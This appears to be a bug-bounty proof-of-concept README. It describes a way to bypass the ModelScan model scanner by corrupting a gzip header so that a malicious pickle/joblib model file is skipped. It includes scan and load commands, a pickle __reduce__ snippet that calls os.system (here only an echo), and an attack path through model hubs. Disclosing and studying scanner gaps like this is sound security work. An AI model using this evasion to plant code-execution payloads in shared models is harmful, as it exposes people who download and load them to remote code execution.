| # ModelScan Bypass - Corrupt Compression Header | |
| **Security Research - ModelScan Bypass Technique** | |
| ## Overview | |
| This repository contains a proof-of-concept demonstrating a bypass technique for ModelScan, | |
| a popular ML model security scanner. This technique allows malicious pickle-based model files | |
| to evade detection. | |
| ## Technique | |
| **Malformed compression header** | |
| Gzip file with corrupted header (first byte modified to 0x00) | |
| ## File | |
| - `exploit_corrupt_header.joblib.gz` | |
| ## Reproduction Steps | |
| ### Testing with ModelScan | |
| ```bash | |
| # Install ModelScan | |
| pip install modelscan | |
| # Download the exploit file from this repository | |
| # Then scan it | |
| modelscan scan -p exploit_corrupt_header.joblib.gz | |
| ``` | |
| ### Expected Result | |
| SKIPPED - Scanner did not analyze this file | |
| ### Triggering the Exploit | |
| ```python | |
| import joblib | |
| # WARNING: This will execute arbitrary code! | |
| model = joblib.load('exploit_corrupt_header.joblib.gz') | |
| ``` | |
| ## Technical Details | |
| This exploit uses Python's pickle `__reduce__` method for RCE: | |
| ```python | |
| def __reduce__(self): | |
| import os | |
| return (os.system, ('echo "RCE executed!"',)) | |
| ``` | |
| **Why ModelScan misses this:** | |
| Gzip file with corrupted header (first byte modified to 0x00) | |
| ## Security Impact | |
| **Severity**: HIGH | |
| **Attack Vector**: | |
| 1. Attacker creates malicious model using this technique | |
| 2. Uploads to model hub (HuggingFace, etc.) | |
| 3. Victim downloads and scans with ModelScan | |
| 4. Scanner reports "No issues found!" or skips the file | |
| 5. Victim loads model → RCE | |
| ## References | |
| - [Huntr Bug Bounty](https://huntr.com/) | |
| - [ModelScan GitHub](https://github.com/protectai/modelscan) | |